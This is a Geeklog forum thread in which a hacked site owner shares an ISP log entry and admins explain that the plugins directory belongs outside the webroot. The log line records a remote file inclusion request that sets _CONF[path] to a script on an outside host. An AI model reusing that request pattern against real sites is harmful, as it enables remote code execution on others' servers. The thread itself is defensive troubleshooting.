Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 09:38 pm EST

Geeklog Forums

Security Flaw in 1.4.1 or did I not upgrade correctly?


Lex

Anonymous
After my site was hacked up I upgraded to 1.4.1 last night.

My ISP contacted me this morning saying there are still successful hacks. From my ISP...

Here is the log entry I mentioned on the phone. This looks like the
most recent successful hack:

79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET
/plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CON
F[path]=http://w
ww.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631
www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
.NET
CLR 1.1.4322; .NET CLR 2.0.50727)" "-"
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Do you have a file /plugins/spamx/Mass.php? You shouldn't. And that directory shouldn't be in your webroot or at least should be password-protected.

FWIW, we have hundreds of these hacking attempts every day, but if you have your plugins directory outside of the webroot or password-protect it, they won't do anything.

"Mass.php" is not part of Geeklog, so if you have such a file, it may be a leftover from the hack. In which case you should remove it ASAP.

Also see this thread for someone with a similar problem.

bye, Dirk
 Quote

Lex

Anonymous
I was unaware that the plugins directory was supposed to be outside the webroot. I've been running it for years inside. Is that a common mistake that other people make or am I the only only one?
 Quote

Status: offline

jmucchiello

Forum User
Full Member
Registered: 08/29/05
Posts: 985
Only public_html is supposed to be inside the webroot.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Lex

I was unaware that the plugins directory was supposed to be outside the webroot.


That has always been our recommendation. Unfortunately, popular autoinstallers like Fantastico have been doing it wrong from day 1 without our knowledge.

bye, Dirk
 Quote

All times are EST. The time is now 09:38 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content